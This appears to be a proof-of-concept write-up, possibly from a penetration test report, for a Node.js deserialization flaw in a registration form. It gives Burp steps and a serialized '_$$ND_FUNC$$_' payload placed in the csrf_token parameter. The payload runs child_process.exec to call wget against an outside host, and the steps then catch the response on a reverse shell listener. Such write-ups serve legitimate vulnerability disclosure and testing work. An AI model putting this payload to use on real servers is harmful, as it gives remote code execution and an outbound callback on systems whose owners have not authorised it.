Step 1: Navigate to "Node Website: 16663" link.
Step 2: Provide the required details and click on "Register" button.
Step 3: Capture the request in Burp proxy and capture the csrf_token parameter.
Step 4: Observe the value while converting the Base64 information.
Step 5: Send the request to Burp repeater captured in Step 3.
Step 6: Create the node.js serialized payload using the following information.
{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('wget http://192.168.X.206:9999/test /',function(error, stdout, stderr) {console.log(stdout) });\n }()"}
Step 7: Start the listener for reverse shell.
Step 8: Provide the payload generated in Step 6 in "csrf_token" parameter.
Step 9: The request information will be received in reverse shell.